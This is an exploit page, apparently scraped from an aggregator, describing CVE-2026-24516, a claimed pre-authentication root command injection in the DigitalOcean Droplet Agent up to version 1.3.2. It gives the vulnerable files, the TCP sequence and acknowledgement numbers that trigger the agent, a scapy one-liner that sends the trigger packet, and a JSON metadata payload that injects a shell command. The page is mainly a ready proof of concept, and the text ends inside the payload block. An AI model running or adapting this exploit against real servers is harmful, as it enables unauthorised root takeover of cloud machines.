## https://sploitus.com/exploit?id=4876C47D-D30D-598E-81A9-B15BF6F41F40
# CVE-2026-24516-DigitalOcean-RCE
Critical Pre-Auth Root RCE (CVSS 10.0) in DigitalOcean Droplet Agent up to v1.3.2 via Command Injection.
# CVE-2026-24516: Pre-Auth Root RCE in DigitalOcean Droplet Agent
## Overview
A critical command injection vulnerability was discovered in the **DigitalOcean Droplet Agent** (all versions up to and including **1.3.2**). This flaw allows an attacker to achieve **Remote Code Execution (RCE)** with **root privileges** without any authentication.
**Discoverer:** Anmol Singh Rajput (@pox_sky_01) - Cortex Security Research
## Technical Details
The vulnerability exists in the troubleshooting actioner component:
- `internal/troubleshooting/actioner/actioner.go`
- `internal/troubleshooting/command/exec.go`
The agent processes metadata from the local service (`169.254.169.254`) and executes commands from the `TroubleshootingAgent.Requesting` array without proper sanitization.
### The Trigger (Port Knocking)
The agent is triggered by a specific TCP packet to port 22:
- **SeqNum:** 68796879
- **AckNum:** 848489
### Proof of Concept (PoC)
1. **Trigger the fetch:**
`python3 -c "from scapy.all import *; send(IP(dst='TARGET')/TCP(dport=22,flags='S',seq=68796879,ack=848489))"`
2. **Malicious Metadata Payload:**
```json
{
"troubleshooting_agent": {
"requesting": ["command:id > /tmp/pwned"]
}
}